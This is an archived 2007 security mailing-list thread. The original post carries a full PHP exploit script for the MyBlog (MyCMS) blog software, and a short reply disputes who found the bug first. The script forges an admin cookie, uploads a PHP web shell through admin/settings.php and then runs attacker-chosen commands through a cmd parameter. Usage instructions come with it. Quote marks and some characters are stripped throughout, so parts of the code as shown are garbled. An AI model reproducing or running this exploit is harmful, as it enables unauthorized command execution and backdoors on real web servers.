Re: MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..

2007-11-23 Thread BlackHawk 

Hello security,

LAME!
already discovered (http://www.milw0rm.com/exploits/4145) on
2007-07-03 by me (BlackHawk)



-- 
Best regards,
 BlackHawkmailto:[EMAIL PROTECTED]

MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..

2007-11-22 Thread security 
Hello,,


MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..


http://sourceforge.net/projects/myblog/


Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]


Exploit : -

#!/usr/bin/php -q -d short_open_tag=on

?

/*

/*  MyCMS Command Execution

/*  This exploit should allow you to execute commands

/*By : HACKERS PAL

/* WwW.SoQoR.NeT

*/

echo('

/**/

/*  MyCmS Command Execution   */

/*by HACKERS PAL [EMAIL PROTECTED] */

/* site: http://www.soqor.net */');

if ($argc4) {

print_r('

/* -- */

/* Usage: php '.$argv[0].' host path cmd

/* Example:   */

/*php '.$argv[0].' localhost /freewps/ id

/**/

');

die;

}


error_reporting(0);

ini_set(max_execution_time,0);

ini_set(default_socket_timeout,5);

 Function get_page($url)

 {


  if(function_exists(file_get_contents))

  {


   $contents = file_get_contents($url);


  }

  else

  {

  $fp=fopen($url,r);

  while($line=fread($fp,1024))

  {

   $contents=$contents.$line;

  }



  }

   return $contents;

 }


function connect($packet)

{

  global $host, $port, $html;

$con=fsockopen(gethostbyname($host),$port);

if (!$con)

{

  echo '[-] Error - No response from '.$host.':'.$port; die;

}

  fputs($con,$packet);

$html='';

while ((!feof($con)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

  $html.=fread($con,1);

}

  GLOBAL $html;

  fclose($con);

}


$i=0;

$data=;


function add_data($name,$value,$type=no,$filename)

{

 GLOBAL $data,$i;

if($type==file)

{

$data.=-7d62702f250530

Content-Disposition: form-data; name=\$filename\; filename=\$name\;

Content-Type: text/plain


$value

;

}

elseif($type==init)

{


$data.=-7d62702f250530--;


}

elseif($type==clean)

{

$data=;

}

else

{

$data.=-7d62702f250530

Content-Disposition: form-data; name=\$name\;

Content-Type: text/plain


$value

;

}



}


$host=$argv[1];

$path=$argv[2];

$cmd=$argv[3];

$port=80;


$cmd=urlencode($cmd);


$p='http://'.$host.':'.$port.$path;


Echo \n[+] Trying to Upload File;


$cookie=admin=1login=HACKERS%20PAL;

$contents='?php

Echo Shell By : HACKERS PAL :)

bra href=\http://www.soqor.net\;WwW.SoQoR.NeT/abr

;

$cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];

system($cmd);

die();

?';


add_data(,);

add_data(content,$contents);

add_data('','',init);


$packet=POST .$p.admin/settings.php HTTP/1.0\r\n;

$packet.=Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*\r\n;

$packet.=Referer: http://.$host.$path.profile.php?mode=editprofile\r\n;;

$packet.=Accept-Language: it\r\n;

$packet.=Content-Type: multipart/form-data; 
boundary=---7d62702f250530\r\n;

$packet.=Accept-Encoding: gzip, deflate\r\n;

$packet.=User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 
SV1)\r\n;

$packet.=Host: .$host.\r\n;

$packet.=Content-Length: .strlen($data).\r\n;

$packet.=Connection: Close\r\n;

$packet.=Cache-Control: no-cache\r\n;

$packet.=Cookie: .$cookie.\r\n\r\n;

$packet.=$data;

connect($packet);



if (eregi(Main Blog Settings,$html))

{

   echo \n[+] Successfully uploaded ...\n[+] Go To 
http://.$p.index.php?cmd=$cmd for your own commands.. \n[+] The Result Of The 
Command\n;

  Echo get_page($p.index.php?cmd=.$cmd);

}

else

{

   echo \n[-] Unable to Upload File\n[-] Exploit Failed;

}

   echo (\n/* Visit us : WwW.SoQoR.NeT   
*/\n/**/);

?


#WwW.SoQoR.NeT